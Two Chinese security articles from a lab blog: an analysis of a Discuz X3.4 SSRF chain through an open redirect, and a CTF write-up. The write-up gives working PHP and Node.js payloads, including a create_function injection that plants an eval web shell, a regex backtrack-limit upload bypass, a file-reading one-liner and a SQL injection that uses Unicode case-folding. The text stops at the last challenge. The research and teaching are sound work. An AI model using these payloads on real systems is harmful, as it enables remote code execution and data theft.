-
Discuz x3.4 前台 SSRF 分析
作者:LoRexxar'@知道创宇404实验室
时间:2018年12月7日2018年12月3日,@L3mOn公开了一个Discuz x3.4版本的前台SSRF,通过利用一个二次跳转加上两个解析问题,可以巧妙地完成SSRF攻击链。https://www.cnblogs.com/iamstudy/articles/discuz_x34_ssrf_1.html 在和小伙伴@Dawu复现过程中发现漏洞本身依赖多个特性,导致可利用环境各种缩减和部分条件的强依赖关系大大减小了该漏洞的危害。后面我们就来详细分析下这个漏洞。
漏洞产生条件
- 版本小于 41eb5bb0a3a716f84b0ce4e4feb41e6f25a980a3 补丁链接
- PHP版本大于PHP 5.3
- php-curl <= 7.54
- DZ运行在80端口
- 默认不影响linux(未100%证实,测试常见linux环境为不影响)
漏洞复现
ssrf
首先漏洞点出现的位置在
/source/module/misc/misc_imgcropper.php line 55
这里
$prefix变量为/然后后面可控,然后进入函数里/source/class/class_image.php line 52 Thumb函数
然后跟入init函数(line 118)中
很明显只要
parse_url解得出host就可以通过dfsockopen发起请求由于这里前面会补一个
/,所以这里的source必须是/开头,一个比较常见的技巧。1//baidu.com这样的链接会自动补上协议,至于怎么补就要看具体的客户端怎么写的了。
我们接着跟
dfsockopen到/source/function/function_core.php line 199
然后到
source/function/function_filesock.php line 31
主要为红框部分的代码,可以看到请求的地址为
parse_url下相应的目标。由于前面提到,链接的最前为
/,所以这里的parse_url就受到了限制。
由于没有
scheme,所以最终curl访问的链接为1://google.com/前面自动补协议就成了
1http://://google.com/这里就涉及到了很严重的问题,就是对于curl来说,请求一个空host究竟会请求到哪里呢?
在windows环境下,libcurl版本
7.53.0
可以看到这里请求了我本机的ipv6的ip。
在linux环境(ubuntu)下,截图为
7.47.0
测试了常见的各种系统,测试过程中没有找到不会报错的curl版本,暂时认为只影响windows的服务端环境。
再回到代码条件下,可以把前面的条件回顾一下:
1、首先我们需要保证
/{}可控在解parse_url操作下存在host。要满足这个条件,我们首先要对
parse_url的结果有个清晰的认识。在没有协议的情况下,好像是参数中不能出现协议或者端口(:号),否则就不会把第一段解析成host,虽然还不知道为什么,这里暂且不论。
在这种情况下,我们只需要把后面可能出现的http去掉就好了,因为无协议的情况下会默认补充http在前面(一般来说)。
2、curl必须要能把空host解析成localhost,所以libcurl版本要求在7.54.0以下,而且目前测试只影响windows服务器(欢迎打脸
3、dz必须在80端口下
在满足上面的所有条件后,我们实际请求了本地的任意目录
12345http://://{可控}===>http://127.0.0.1/{可控}但这实际上来说没有什么用,所以我们还需要一个任意url跳转才行,否则只能攻击本地意义就很小了。
任意url跳转
为了能够和前面的要求产生联动,我们需要一个get型、不需要登陆的任意url跳转。
dz在logout的时候会从referer参数(非header头参数)中获取值,然后进入301跳转,而这里唯一的要求是对host有一定的验证,让我们来看看代码。
/source/function/function_core.php:1498
上面的截图解释了这段代码的主要问题,核心代码为红框部分。
为了让referer不改变,我们必须让host只有一个字符,但很显然,如果host只能有一个字符,我们没办法控制任意url跳转。
所以我们需要想办法让
parse_url和curl对同一个url的目标解析不一致,才有可能达到我们的目标。1http://localhost#@www.baidu.com/上面这个链接
parse_url解析出来为localhost,而curl解释为www.baidu.com我们抓个包来看看
成功绕过了各种限制
利用
到现在我们手握ssrf+任意url跳转,我们只需要攻击链连接起来就可以了。攻击流程如下
1234567cutimg ssrf link=====>服务端访问logout任意url跳转====301====>跳转到evil服务器=====302=====>任意目标,如gophar、http等当然最开始访问cutimg页面时,需要先获取formhash,而且referer也要相应修改,否则会直接拦截。
exp演示
本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/756/没有评论 -
Code Breaking 挑战赛 Writeup
作者:LoRexxar'@知道创宇404实验室
时间:2018年12月7日@phith0n 在代码审计小密圈二周年的时候发起了Code-Breaking Puzzles挑战赛,其中包含了php、java、js、python各种硬核的代码审计技巧。在研究复现the js的过程中,我花费了大量的精力,也逐渐找到代码审计的一些技巧,这里主要分享了5道ez题目和1道hard的the js这道题目的writeup,希望阅读本文的你可以从题目中学习到属于代码审计的思考逻辑和技巧。 easy - function
123456789<span class="cp"><?php</span><span class="nv">$action</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'action'</span><span class="p">]</span> <span class="o">??</span> <span class="s1">''</span><span class="p">;</span><span class="nv">$arg</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'arg'</span><span class="p">]</span> <span class="o">??</span> <span class="s1">''</span><span class="p">;</span><span class="k">if</span><span class="p">(</span><span class="nb">preg_match</span><span class="p">(</span><span class="s1">'/^[a-z0-9_]*$/isD'</span><span class="p">,</span> <span class="nv">$action</span><span class="p">))</span> <span class="p">{</span><span class="nb">show_source</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">);</span><span class="p">}</span> <span class="k">else</span> <span class="p">{</span><span class="nv">$action</span><span class="p">(</span><span class="s1">''</span><span class="p">,</span> <span class="nv">$arg</span><span class="p">);</span><span class="p">}</span>思路还算是比较清晰,正则很明显,就是要想办法在函数名的头或者尾找一个字符,不影响函数调用。
简单实验了一下没找到,那就直接fuzz起来吧
很容易就fuzz到了就是
\这个符号后来稍微翻了翻别人的writeup,才知道原因,在PHP的命名空间默认为
\,所有的函数和类都在\这个命名空间中,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;而如果写\function_name() 这样调用函数,则其实是写了一个绝对路径。如果你在其他namespace里调用系统类,就必须写绝对路径这种写法。紧接着就到了如何只控制第二个参数来执行命令的问题了,后来找到可以用
create_function来完成,create_function的第一个参数是参数,第二个参数是内容。函数结构形似
1234567<span class="nx">create_function</span><span class="p">(</span><span class="s1">'$a,$b'</span><span class="p">,</span><span class="s1">'return 111'</span><span class="p">)</span><span class="o">==></span><span class="kd">function</span> <span class="nx">a</span><span class="p">(</span><span class="nx">$a</span><span class="p">,</span> <span class="nx">$b</span><span class="p">){</span><span class="k">return</span> <span class="mi">111</span><span class="p">;</span><span class="p">}</span>然后执行,如果我们想要执行任意代码,就首先需要跳出这个函数定义。
1234567<span class="nx">create_function</span><span class="p">(</span><span class="s1">'$a,$b'</span><span class="p">,</span><span class="s1">'return 111;}phpinfo();//'</span><span class="p">)</span><span class="o">==></span><span class="kd">function</span> <span class="nx">a</span><span class="p">(</span><span class="nx">$a</span><span class="p">,</span> <span class="nx">$b</span><span class="p">){</span><span class="k">return</span> <span class="mi">111</span><span class="p">;}</span><span class="nx">phpinfo</span><span class="p">();</span><span class="c1">//</span><span class="p">}</span>这样一来,我们想要执行的代码就会执行
exp
1<span class="nt">http</span><span class="o">://</span><span class="nt">51</span><span class="p">.</span><span class="nc">158</span><span class="p">.</span><span class="nc">75</span><span class="p">.</span><span class="nc">42</span><span class="p">:</span><span class="nd">8087</span><span class="o">/?</span><span class="nt">action</span><span class="o">=%</span><span class="nt">5Ccreate_function</span><span class="o">&</span><span class="nt">arg</span><span class="o">=</span><span class="nt">return</span><span class="o">%</span><span class="nt">202333</span><span class="o">;%</span><span class="nt">7Deval</span><span class="o">($</span><span class="nt">_POST</span><span class="o">%</span><span class="nt">5B</span><span class="o">%</span><span class="nt">27ddog</span><span class="o">%</span><span class="nt">27</span><span class="o">%</span><span class="nt">5D</span><span class="o">);%</span><span class="nt">2f</span><span class="o">%</span><span class="nt">2f</span>
easy pcrewaf
1234567891011121314151617181920<span class="o"><?</span><span class="nx">php</span><span class="kd">function</span> <span class="nx">is_php</span><span class="p">(</span><span class="nx">$data</span><span class="p">){</span><span class="k">return</span> <span class="nx">preg_match</span><span class="p">(</span><span class="s1">'/<\?.*[(`;?>].*/is'</span><span class="p">,</span> <span class="nx">$data</span><span class="p">);</span><span class="p">}</span><span class="k">if</span><span class="p">(</span><span class="nx">empty</span><span class="p">(</span><span class="nx">$_FILES</span><span class="p">))</span> <span class="p">{</span><span class="nx">die</span><span class="p">(</span><span class="nx">show_source</span><span class="p">(</span><span class="nx">__FILE__</span><span class="p">));</span><span class="p">}</span><span class="nx">$user_dir</span> <span class="o">=</span> <span class="s1">'./data/'</span><span class="p">;</span><span class="nx">$data</span> <span class="o">=</span> <span class="nx">file_get_contents</span><span class="p">(</span><span class="nx">$_FILES</span><span class="p">[</span><span class="s1">'file'</span><span class="p">][</span><span class="s1">'tmp_name'</span><span class="p">]);</span><span class="k">if</span> <span class="p">(</span><span class="nx">is_php</span><span class="p">(</span><span class="nx">$data</span><span class="p">))</span> <span class="p">{</span><span class="nx">echo</span> <span class="s2">"bad request"</span><span class="p">;</span><span class="p">}</span> <span class="k">else</span> <span class="p">{</span><span class="kd">@mkdir</span><span class="p">(</span><span class="nx">$user_dir</span><span class="p">,</span> <span class="mi">0755</span><span class="p">);</span><span class="nx">$path</span> <span class="o">=</span> <span class="nx">$user_dir</span> <span class="p">.</span> <span class="s1">'/'</span> <span class="p">.</span> <span class="nx">random_int</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">10</span><span class="p">)</span> <span class="p">.</span> <span class="s1">'.php'</span><span class="p">;</span><span class="nx">move_uploaded_file</span><span class="p">(</span><span class="nx">$_FILES</span><span class="p">[</span><span class="s1">'file'</span><span class="p">][</span><span class="s1">'tmp_name'</span><span class="p">],</span> <span class="nx">$path</span><span class="p">);</span><span class="nx">header</span><span class="p">(</span><span class="s2">"Location: $path"</span><span class="p">,</span> <span class="kc">true</span><span class="p">,</span> <span class="mi">303</span><span class="p">);</span><span class="p">}</span>这题自己研究的时候没想到怎么做,不过思路很清楚,文件名不可控,唯一能控制的就是文件内容。
所以问题的症结就在于如何绕过这个正则表达式。
1/<\?.*[(`;?>].*/is简单来说就是
<后面不能有问号,<?后面不能有(;?>反引号,但很显然,这是不可能的,最少执行函数也需要括号才行。从常规的思路肯定不行https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
之后看ph师傅的文章我们看到了问题所在,
pcre.backtrack_limit这个配置决定了在php中,正则引擎回溯的层数。而这个值默认是1000000.
而什么是正则引擎回溯呢?
在正则中
.*表示匹配任意字符任意位,也就是说他会匹配所有的字符,而正则引擎在解析正则的时候必然是逐位匹配的,对于1<span class="cp"><?php</span> <span class="nb">phpinfo</span><span class="p">();</span><span class="c1">//faaaaaaaaaaaaaaaaaaaaaaaaaa</span>这段代码来说
123456首先<匹配<然后?匹配?然后.*会直接匹配到结尾php phpinfo();//faaaaaaaaaaaaaaaaaaaaaaaaaa紧接着匹配[(`;?>],问题出现了,上一步匹配到了结尾,后面没有满足要求的符号了。从这里开始正则引擎就开始逐渐回溯,知道符合要求的;出现为止但很显然,服务端不可能不做任何限制,不然如果post一个无限长的数据,那么服务端就会浪费太多的资源在这里,所以就有了
pcre.backtrack_limit,如果回溯次数超过100万次,那么匹配就会结束,然后跳过这句语句。回到题目来看,如果能够跳过这句语句,我们就能上传任意文件内容了!
所以最终post就是传一个内容为
1<span class="cp"><?php</span> <span class="nb">phpinfo</span><span class="p">();</span><span class="c1">//a*1000000</span>
对于任何一种引擎来说都涉及到这个问题,尤其对于文件内容来说,没办法控制文件的长度,也就不可避免的会出现这样的问题。
对于PHP来说,有这样一个解决办法,在php的正则文档中提到这样一个问题
preg_match返回的是匹配到的次数,如果匹配不到会返回0,如果报错就会返回false所以,对
preg_match来说,只要对返回结果有判断,就可以避免这样的问题。easy - phpmagic
题目代码简化之后如下
123456789101112131415161718192021222324252627<span class="cp"><?php</span><span class="k">if</span><span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'read-source'</span><span class="p">]))</span> <span class="p">{</span><span class="k">exit</span><span class="p">(</span><span class="nb">show_source</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">));</span><span class="p">}</span><span class="nb">define</span><span class="p">(</span><span class="s1">'DATA_DIR'</span><span class="p">,</span> <span class="nb">dirname</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">)</span> <span class="o">.</span> <span class="s1">'/data/'</span> <span class="o">.</span> <span class="nb">md5</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'REMOTE_ADDR'</span><span class="p">]));</span><span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">is_dir</span><span class="p">(</span><span class="nx">DATA_DIR</span><span class="p">))</span> <span class="p">{</span><span class="nb">mkdir</span><span class="p">(</span><span class="nx">DATA_DIR</span><span class="p">,</span> <span class="mo">0755</span><span class="p">,</span> <span class="k">true</span><span class="p">);</span><span class="p">}</span><span class="nb">chdir</span><span class="p">(</span><span class="nx">DATA_DIR</span><span class="p">);</span><span class="nv">$domain</span> <span class="o">=</span> <span class="nb">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'domain'</span><span class="p">])</span> <span class="o">?</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'domain'</span><span class="p">]</span> <span class="o">:</span> <span class="s1">''</span><span class="p">;</span><span class="nv">$log_name</span> <span class="o">=</span> <span class="nb">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">'log'</span><span class="p">])</span> <span class="o">?</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'log'</span><span class="p">]</span> <span class="o">:</span> <span class="nb">date</span><span class="p">(</span><span class="s1">'-Y-m-d'</span><span class="p">);</span><span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">)</span> <span class="o">&&</span> <span class="nv">$domain</span><span class="p">)</span><span class="o">:</span><span class="nv">$command</span> <span class="o">=</span> <span class="nb">sprintf</span><span class="p">(</span><span class="s2">"dig -t A -q %s"</span><span class="p">,</span> <span class="nb">escapeshellarg</span><span class="p">(</span><span class="nv">$domain</span><span class="p">));</span><span class="nv">$output</span> <span class="o">=</span> <span class="nb">shell_exec</span><span class="p">(</span><span class="nv">$command</span><span class="p">);</span><span class="nv">$output</span> <span class="o">=</span> <span class="nb">htmlspecialchars</span><span class="p">(</span><span class="nv">$output</span><span class="p">,</span> <span class="nx">ENT_HTML401</span> <span class="o">|</span> <span class="nx">ENT_QUOTES</span><span class="p">);</span><span class="nv">$log_name</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'SERVER_NAME'</span><span class="p">]</span> <span class="o">.</span> <span class="nv">$log_name</span><span class="p">;</span><span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">in_array</span><span class="p">(</span><span class="nb">pathinfo</span><span class="p">(</span><span class="nv">$log_name</span><span class="p">,</span> <span class="nx">PATHINFO_EXTENSION</span><span class="p">),</span> <span class="p">[</span><span class="s1">'php'</span><span class="p">,</span> <span class="s1">'php3'</span><span class="p">,</span> <span class="s1">'php4'</span><span class="p">,</span> <span class="s1">'php5'</span><span class="p">,</span> <span class="s1">'phtml'</span><span class="p">,</span> <span class="s1">'pht'</span><span class="p">],</span> <span class="k">true</span><span class="p">))</span> <span class="p">{</span><span class="nb">file_put_contents</span><span class="p">(</span><span class="nv">$log_name</span><span class="p">,</span> <span class="nv">$output</span><span class="p">);</span><span class="p">}</span><span class="k">echo</span> <span class="nv">$output</span><span class="p">;</span><span class="k">endif</span><span class="p">;</span> <span class="cp">?></span>稍微阅读一下代码不难发现问题有几个核心点
1、没办法完全控制dig的返回,由于没办法命令注入,所以这里只能执行dig命令,唯一能控制的就是dig的目标,而且返回在显示之前还转义了尖括号,所以
12345678910111213141516<span class="o">;</span> <span class="o"><<>></span> <span class="nt">DiG</span> <span class="nt">9</span><span class="p">.</span><span class="nc">9</span><span class="p">.</span><span class="nc">5-9</span><span class="o">+</span><span class="nt">deb8u15-Debian</span> <span class="o"><<>></span> <span class="nt">-t</span> <span class="nt">A</span> <span class="nt">-q</span> <span class="nt">1232321321</span><span class="o">;;</span> <span class="nt">global</span> <span class="nt">options</span><span class="o">:</span> <span class="o">+</span><span class="nt">cmd</span><span class="o">;;</span> <span class="nt">Got</span> <span class="nt">answer</span><span class="o">:</span><span class="o">;;</span> <span class="nt">-</span><span class="o">>></span><span class="nt">HEADER</span><span class="o"><<</span><span class="nt">-</span> <span class="nt">opcode</span><span class="o">:</span> <span class="nt">QUERY</span><span class="o">,</span> <span class="nt">status</span><span class="o">:</span> <span class="nt">NXDOMAIN</span><span class="o">,</span> <span class="nt">id</span><span class="o">:</span> <span class="nt">43507</span><span class="o">;;</span> <span class="nt">flags</span><span class="o">:</span> <span class="nt">qr</span> <span class="nt">rd</span> <span class="nt">ra</span><span class="o">;</span> <span class="nt">QUERY</span><span class="o">:</span> <span class="nt">1</span><span class="o">,</span> <span class="nt">ANSWER</span><span class="o">:</span> <span class="nt">0</span><span class="o">,</span> <span class="nt">AUTHORITY</span><span class="o">:</span> <span class="nt">1</span><span class="o">,</span> <span class="nt">ADDITIONAL</span><span class="o">:</span> <span class="nt">0</span><span class="o">;;</span> <span class="nt">QUESTION</span> <span class="nt">SECTION</span><span class="o">:</span><span class="o">;</span><span class="nt">1232321321</span><span class="o">.</span> <span class="nt">IN</span> <span class="nt">A</span><span class="o">;;</span> <span class="nt">AUTHORITY</span> <span class="nt">SECTION</span><span class="o">:</span><span class="o">.</span> <span class="nt">10800</span> <span class="nt">IN</span> <span class="nt">SOA</span> <span class="nt">a</span><span class="p">.</span><span class="nc">root-servers</span><span class="p">.</span><span class="nc">net</span><span class="o">.</span> <span class="nt">nstld</span><span class="p">.</span><span class="nc">verisign-grs</span><span class="p">.</span><span class="nc">com</span><span class="o">.</span> <span class="nt">2018112800</span> <span class="nt">1800</span> <span class="nt">900</span> <span class="nt">604800</span> <span class="nt">86400</span><span class="o">;;</span> <span class="nt">Query</span> <span class="nt">time</span><span class="o">:</span> <span class="nt">449</span> <span class="nt">msec</span><span class="o">;;</span> <span class="nt">SERVER</span><span class="o">:</span> <span class="nt">127</span><span class="p">.</span><span class="nc">0</span><span class="p">.</span><span class="nc">0</span><span class="p">.</span><span class="nc">11</span><span class="p">#</span><span class="nn">53</span><span class="o">(</span><span class="nt">127</span><span class="p">.</span><span class="nc">0</span><span class="p">.</span><span class="nc">0</span><span class="p">.</span><span class="nc">11</span><span class="o">)</span><span class="o">;;</span> <span class="nt">WHEN</span><span class="o">:</span> <span class="nt">Wed</span> <span class="nt">Nov</span> <span class="nt">28</span> <span class="nt">08</span><span class="p">:</span><span class="nd">26</span><span class="p">:</span><span class="nd">15</span> <span class="nt">UTC</span> <span class="nt">2018</span><span class="o">;;</span> <span class="nt">MSG</span> <span class="nt">SIZE</span> <span class="nt">rcvd</span><span class="o">:</span> <span class="nt">103</span>2、
in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)这句过滤真的很严格,实在的讲没有什么直白的绕过办法。3、log前面会加上
$_SERVER['SERVER_NAME']第一点真的是想不到,是看了别人的wp才想明白这个关键点 http://f1sh.site/2018/11/25/code-breaking-puzzles%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/
之前做题的时候曾经遇到过类似的问题,可以通过解base64来隐藏自己要写入的内容绕过过滤,然后php在解析的时候会忽略各种乱码,只会从
<?php开始,所以其他的乱码都不会影响到内容,唯一要注意的就是base64是4位一解的,主要不要把第一位打乱掉。简单测试一下
1234567891011121314151617181920212223<span class="o">$</span><span class="nt">output</span> <span class="o">=</span> <span class="o"><<<</span><span class="nt">EOT</span><span class="o">;</span> <span class="o"><<>></span> <span class="nt">DiG</span> <span class="nt">9</span><span class="p">.</span><span class="nc">9</span><span class="p">.</span><span class="nc">5-9</span><span class="o">+</span><span class="nt">deb8u15-Debian</span> <span class="o"><<>></span> <span class="nt">-t</span> <span class="nt">A</span> <span class="nt">-q</span> <span class="s2">"$domain"</span><span class="o">;;</span> <span class="nt">global</span> <span class="nt">options</span><span class="o">:</span> <span class="o">+</span><span class="nt">cmd</span><span class="o">;;</span> <span class="nt">Got</span> <span class="nt">answer</span><span class="o">:</span><span class="o">;;</span> <span class="nt">-</span><span class="o">>></span><span class="nt">HEADER</span><span class="o"><<</span><span class="nt">-</span> <span class="nt">opcode</span><span class="o">:</span> <span class="nt">QUERY</span><span class="o">,</span> <span class="nt">status</span><span class="o">:</span> <span class="nt">NXDOMAIN</span><span class="o">,</span> <span class="nt">id</span><span class="o">:</span> <span class="nt">43507</span><span class="o">;;</span> <span class="nt">flags</span><span class="o">:</span> <span class="nt">qr</span> <span class="nt">rd</span> <span class="nt">ra</span><span class="o">;</span> <span class="nt">QUERY</span><span class="o">:</span> <span class="nt">1</span><span class="o">,</span> <span class="nt">ANSWER</span><span class="o">:</span> <span class="nt">0</span><span class="o">,</span> <span class="nt">AUTHORITY</span><span class="o">:</span> <span class="nt">1</span><span class="o">,</span> <span class="nt">ADDITIONAL</span><span class="o">:</span> <span class="nt">0</span><span class="o">;;</span> <span class="nt">QUESTION</span> <span class="nt">SECTION</span><span class="o">:</span><span class="o">;</span><span class="nt">1232321321</span><span class="o">.</span> <span class="nt">IN</span> <span class="nt">A</span><span class="o">;;</span> <span class="nt">AUTHORITY</span> <span class="nt">SECTION</span><span class="o">:</span><span class="o">.</span> <span class="nt">10800</span> <span class="nt">IN</span> <span class="nt">SOA</span> <span class="nt">a</span><span class="p">.</span><span class="nc">root-servers</span><span class="p">.</span><span class="nc">net</span><span class="o">.</span> <span class="nt">nstld</span><span class="p">.</span><span class="nc">verisign-grs</span><span class="p">.</span><span class="nc">com</span><span class="o">.</span> <span class="nt">2018112800</span> <span class="nt">1800</span> <span class="nt">900</span> <span class="nt">604800</span> <span class="nt">86400</span><span class="o">;;</span> <span class="nt">Query</span> <span class="nt">time</span><span class="o">:</span> <span class="nt">449</span> <span class="nt">msec</span><span class="o">;;</span> <span class="nt">SERVER</span><span class="o">:</span> <span class="nt">127</span><span class="p">.</span><span class="nc">0</span><span class="p">.</span><span class="nc">0</span><span class="p">.</span><span class="nc">11</span><span class="p">#</span><span class="nn">53</span><span class="o">(</span><span class="nt">127</span><span class="p">.</span><span class="nc">0</span><span class="p">.</span><span class="nc">0</span><span class="p">.</span><span class="nc">11</span><span class="o">)</span><span class="o">;;</span> <span class="nt">WHEN</span><span class="o">:</span> <span class="nt">Wed</span> <span class="nt">Nov</span> <span class="nt">28</span> <span class="nt">08</span><span class="p">:</span><span class="nd">26</span><span class="p">:</span><span class="nd">15</span> <span class="nt">UTC</span> <span class="nt">2018</span><span class="o">;;</span> <span class="nt">MSG</span> <span class="nt">SIZE</span> <span class="nt">rcvd</span><span class="o">:</span> <span class="nt">103</span><span class="nt">EOT</span><span class="o">;</span><span class="o">$</span><span class="nt">output</span> <span class="o">=</span> <span class="nt">htmlspecialchars</span><span class="o">($</span><span class="nt">output</span><span class="o">,</span> <span class="nt">ENT_HTML401</span> <span class="o">|</span> <span class="nt">ENT_QUOTES</span><span class="o">);</span><span class="nt">var_dump</span><span class="o">($</span><span class="nt">output</span><span class="o">);</span><span class="nt">var_dump</span><span class="o">(</span><span class="nt">base64_decode</span><span class="o">($</span><span class="nt">output</span><span class="o">));</span>
这样一来我们就能控制文件内容了,而且可以注入
<?php了接下来就是第二步,怎么才能控制logname为调用php伪协议呢?
问题就在于我们如何控制
$_SERVER['SERVER_NAME'],而这个值怎么定是不一定的,这里在这个题目中是取自了头中的host。这样一来头我们可以控制了,我们就能调用php伪协议了,那么怎么绕过后缀限制呢?
这里用了之前曾经遇到过的一个技巧(老了记性不好,翻了半天也没找到是啥比赛遇到的),test.php/.就会直接调用到test.php
通过这个办法可以绕过根据.来分割后缀的各种限制条件,同样也适用于当前环境下。
最终poc:
easy - phplimit
123456<span class="cp"><?php</span><span class="k">if</span><span class="p">(</span><span class="s1">';'</span> <span class="o">===</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s1">'/[^\W]+\((?R)?\)/'</span><span class="p">,</span> <span class="s1">''</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'code'</span><span class="p">]))</span> <span class="p">{</span><span class="k">eval</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'code'</span><span class="p">]);</span><span class="p">}</span> <span class="k">else</span> <span class="p">{</span><span class="nb">show_source</span><span class="p">(</span><span class="no">__FILE__</span><span class="p">);</span><span class="p">}</span>这个代码就简单多了,简单来说就是只能执行一个函数,但不能设置参数,这题最早出现是在RCTF2018中
https://lorexxar.cn/2018/05/23/rctf2018/
在原来的题目中是用
next(getallheaders())绕过这个限制的。但这里getallheaders是apache中的函数,这里是nginx环境,所以目标就是找一个函数其返回的内容是可以控制的就可以了。
问题就在于这种函数还不太好找,首先nginx中并没有能获取all header的函数。
所以目标基本就锁定在会不会有获取cookie,或者所有变量这种函数。在看别人writeup的时候知道了
get_defined_vars这个函数http://php.net/manual/zh/function.get-defined-vars.php
他会打印所有已定义的变量(包括全局变量GET等)。简单翻了翻PHP的文档也没找到其他会涉及到可控变量的
在原wp中有一个很厉害的操作,直接reset所有的变量。
http://f1sh.site/2018/11/25/code-breaking-puzzles%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/
然后只有当前get赋值,那么就只剩下get请求的变量了
后面就简单了拼接就好了
然后...直接列目录好像也是个不错的办法2333
1code=readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))));easy - nodechr
nodejs的一个小问题,关键代码如下
12345678910111213141516171819202122232425262728293031<span class="kd">function</span> <span class="nx">safeKeyword</span><span class="p">(</span><span class="nx">keyword</span><span class="p">)</span> <span class="p">{</span><span class="k">if</span><span class="p">(</span><span class="nx">isString</span><span class="p">(</span><span class="nx">keyword</span><span class="p">)</span> <span class="o">&&</span> <span class="o">!</span><span class="nx">keyword</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="err">/(union|select|;|\-\-)/is)) {</span><span class="k">return</span> <span class="nx">keyword</span><span class="p">}</span><span class="k">return</span> <span class="kc">undefined</span><span class="p">}</span><span class="nx">async</span> <span class="kd">function</span> <span class="nx">login</span><span class="p">(</span><span class="nx">ctx</span><span class="p">,</span> <span class="nx">next</span><span class="p">)</span> <span class="p">{</span><span class="k">if</span><span class="p">(</span><span class="nx">ctx</span><span class="p">.</span><span class="nx">method</span> <span class="o">==</span> <span class="s1">'POST'</span><span class="p">)</span> <span class="p">{</span><span class="kd">let</span> <span class="nx">username</span> <span class="o">=</span> <span class="nx">safeKeyword</span><span class="p">(</span><span class="nx">ctx</span><span class="p">.</span><span class="nx">request</span><span class="p">.</span><span class="nx">body</span><span class="p">[</span><span class="s1">'username'</span><span class="p">])</span><span class="kd">let</span> <span class="nx">password</span> <span class="o">=</span> <span class="nx">safeKeyword</span><span class="p">(</span><span class="nx">ctx</span><span class="p">.</span><span class="nx">request</span><span class="p">.</span><span class="nx">body</span><span class="p">[</span><span class="s1">'password'</span><span class="p">])</span><span class="kd">let</span> <span class="nx">jump</span> <span class="o">=</span> <span class="nx">ctx</span><span class="p">.</span><span class="nx">router</span><span class="p">.</span><span class="nx">url</span><span class="p">(</span><span class="s1">'login'</span><span class="p">)</span><span class="k">if</span> <span class="p">(</span><span class="nx">username</span> <span class="o">&&</span> <span class="nx">password</span><span class="p">)</span> <span class="p">{</span><span class="kd">let</span> <span class="nx">user</span> <span class="o">=</span> <span class="nx">await</span> <span class="nx">ctx</span><span class="p">.</span><span class="nx">db</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="sb">`SELECT * FROM "users" WHERE "username" = '</span><span class="si">${</span><span class="nx">username</span><span class="p">.</span><span class="nx">toUpperCase</span><span class="p">()</span><span class="si">}</span><span class="sb">' AND "password" = '</span><span class="si">${</span><span class="nx">password</span><span class="p">.</span><span class="nx">toUpperCase</span><span class="p">()</span><span class="si">}</span><span class="sb">'`</span><span class="p">)</span><span class="k">if</span> <span class="p">(</span><span class="nx">user</span><span class="p">)</span> <span class="p">{</span><span class="nx">ctx</span><span class="p">.</span><span class="nx">session</span><span class="p">.</span><span class="nx">user</span> <span class="o">=</span> <span class="nx">user</span><span class="nx">jump</span> <span class="o">=</span> <span class="nx">ctx</span><span class="p">.</span><span class="nx">router</span><span class="p">.</span><span class="nx">url</span><span class="p">(</span><span class="s1">'admin'</span><span class="p">)</span><span class="p">}</span><span class="p">}</span><span class="nx">ctx</span><span class="p">.</span><span class="nx">status</span> <span class="o">=</span> <span class="mi">303</span><span class="nx">ctx</span><span class="p">.</span><span class="nx">redirect</span><span class="p">(</span><span class="nx">jump</span><span class="p">)</span><span class="p">}</span> <span class="k">else</span> <span class="p">{</span><span class="nx">await</span> <span class="nx">ctx</span><span class="p">.</span><span class="nx">render</span><span class="p">(</span><span class="s1">'index'</span><span class="p">)</span><span class="p">}</span><span class="p">}</span>这里的注入应该是比较清楚的,直接拼接进查询语句没什么可说的。
然后safekeyword过滤了
select union -- ;这四个,下面的逻辑其实说简单的就一句1c = `SELECT * FROM "users" WHERE "username" = '<span class="cp">${</span><span class="n">a</span><span class="o">.</span><span class="n">toUpperCase</span><span class="p">()</span><span class="cp">}</span>' AND "password" = '<span class="cp">${</span><span class="n">b</span><span class="o">.</span><span class="n">toUpperCase</span><span class="p">()</span><span class="cp">}</span>'`如何构造这句来查询flag,开始看到题一味着去想盲注的办法了,后来想明白一点,在注入里,没有select是不可能去别的表里拿数据的,而题目一开始很明确的表明flag在flag表中。
所以问题就又回到了最初的地方,如何绕过safekeyword的限制。
ph师傅曾经写过一篇文章 https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html
在js中部分字符会在toLowerCase和toUpperCase处理的时候发生难以想象的变化
12"?"、"?"这两个字符在变大写的时候会变成I和S"?"这个字符在变小写的时候会变成k用在这里刚好合适不过了。
12username=ddogpassword=' un?on ?elect 1,flag,3 where '1'='1hard - thejs
javascript真难....
关键代码以及注释如下
